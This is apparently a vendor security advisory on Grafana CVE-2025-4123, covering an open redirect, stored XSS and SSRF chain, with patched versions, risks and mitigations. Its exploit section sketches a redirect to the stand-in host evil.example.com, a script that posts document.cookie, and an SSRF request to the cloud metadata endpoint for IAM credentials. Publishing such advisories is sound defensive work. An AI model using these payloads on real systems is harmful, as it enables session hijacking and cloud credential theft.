Exploited! Grafana CVE-2025-4123 – Open Redirect & Stored XSS Give Attackers a Springboard Into Your Cloud

Grafana—the cloud-native observability dashboard almost every DevOps team relies on—rushed out Grafana 12.0.0-security-01 yesterday to squash CVE-2025-4123, a high-severity open-redirect and stored cross-site scripting (XSS) vulnerability. When chained with the popular Grafana Image Renderer plugin the bug escalates to a full-read server-side request forgery (SSRF), exposing cloud-metadata services and internal APIs. Grafana Cloud SaaS tenants are not affected, but any self-hosted instance on an earlier release is in the blast zone.

Since Grafana often acts as the single pane of glass for SREs, surfacing real-time metrics from Prometheus, Loki, and Tempo. A compromised dashboard is more than a UI problem—attackers gain a pivot point into every data-source credential Grafana stores, often including cloud keys, database passwords, and on-call notification tokens. That dramatically widens the blast radius.

 

What is CVE-2025-4123?

A bug-bounty report on April 26 2025 uncovered a flaw in Grafana’s URL-sanitisation logic for custom frontend-plugin downloads. By smuggling a double-encoded path-traversal sequence (..%2F) into the /redirect endpoint, an attacker forces Grafana to forward the victim’s browser to any external URL under their control. Hosting a specially crafted plugin manifest on that site lets the attacker inject arbitrary JavaScript that executes in the trusted grafana-origin context—classic stored XSS. When anonymous access is enabled (default in many lab and demo environments) the attack needs no credentials at all.

 

Impacted Versions (patched releases)

Upgrade to the first “security-01” build available for your branch:

• 12.0.0-security-01
• 11.6.1-security-01
• 11.5.4-security-01
• 11.4.4-security-01
• 11.3.6-security-01
• 11.2.9-security-01
• 10.4.18-security-01

All earlier 12.x, 11.x, 10.x—and all unsupported Grafana 9/8 releases—remain vulnerable.

Exploit Methods – From Redirect to XSS to SSRF

# 1. Evil plugin bundle (plugin.json + malware.js) is hosted at evil.example.com

# 2. Attacker crafts encoded redirect link:

https://grafana-vuln.local/redirect?url=https%3A%2F%2Fevil.example.com%2Fgplug.zip

# 3. Victim clicks link (phishing, iframe, Slack mention).

# 4. Grafana fetches ZIP, installs plugin, JS runs inside grafana.domain:

fetch('/api/login/ping', {method:'POST', body: document.cookie});

# 5. If grafana-image-renderer present:

POST /api/render?url=http://169.254.169.254/latest/meta-data/iam/security-credentials

# → returns AWS creds (full-read SSRF)

Why the chain works:

• Path traversal + open redirect bypass Grafana’s allow-list.
• Unsigned plugins load when allow_loading_unsigned_plugins = true.
• Stored XSS fires in a privileged origin, stealing session tokens or creating admin users.
• Image Renderer proxies arbitrary URLs, enabling SSRF.

Potential Risk

• Session hijacking & account takeover—stolen cookies or JWTs grant full dashboard access.
• Privilege escalation inside Grafana—attackers can add data-sources or tamper with alerting rules.
• Read-anywhere SSRF—exposure of cloud IAM credentials and internal REST endpoints.
• Telemetry exfiltration & fake metrics—poisoned panels mislead SREs during incidents.
• Lateral movement—Grafana often runs with high-privilege Kubernetes ServiceAccount tokens.

Mitigation

1. Patch immediately – docker pull grafana/grafana:12.0.0-security-01 (or the matching tag above).

• Disable anonymous access – in grafana.ini set [auth.anonymous] enabled = false.

• Enable a strict Content-Security-Policy until you can patch:

[security]

content_security_policy = true

content_security_policy_template = "script-src 'self'; object-src 'none';"

• Remove or update the Image Renderer plugin if unused.

• Restrict outbound egress so Grafana can fetch only approved domains.

• Hunt for IOCs—look for /redirect?url= requests and unexpected plugin ZIP downloads in reverse-proxy logs.

Am I Impacted by CVE-2025-4123?

IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit-simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

IONIX customers will see updated risk posture automatically populated in dashboards over the next scan cycle.

References

• Grafana Labs, “High-severity security fix for CVE-2025-4123,” May 21 2025
• Grafana Security Advisory Page – CVE-2025-4123
• Tenable, “CVE-2025-4123 Grafana XSS,” May 22 2025
• Wiz Research DB entry
• Nightbloodz, “Full-Read SSRF & Account Takeover,” Medium, May 22 2025